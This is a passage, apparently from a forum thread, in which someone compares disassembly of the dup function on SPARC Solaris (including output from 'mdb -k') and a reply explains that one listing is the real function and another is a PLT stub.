0x20abc: unimp 0x109d4
0x20ac0: unimp 0x1d
(3) I use the command: echo "dup::dis" | mdb -k, and the assembly code:
dup: sra %o0, 0x0, %o0
dup+4: mov %o7, %g1
dup+8: clr %o2
dup+0xc: clr %o1
dup+0x10: call -0xeec <fcntl>
dup+0x14: mov %g1, %o7
Why do the three methods output different assembly code for the same function?
Case (1) shows the disassembly for the actual function.
Case (2) shows the PLT (procedure linkage table) entry for the function. The PLT is used to resolve functions imported from shared libraries. This is used by the main program when it invokes the function. Code flow will eventually end up in the real function, of course, through the help of the runtime linker.
Case (3): I have no idea what this is.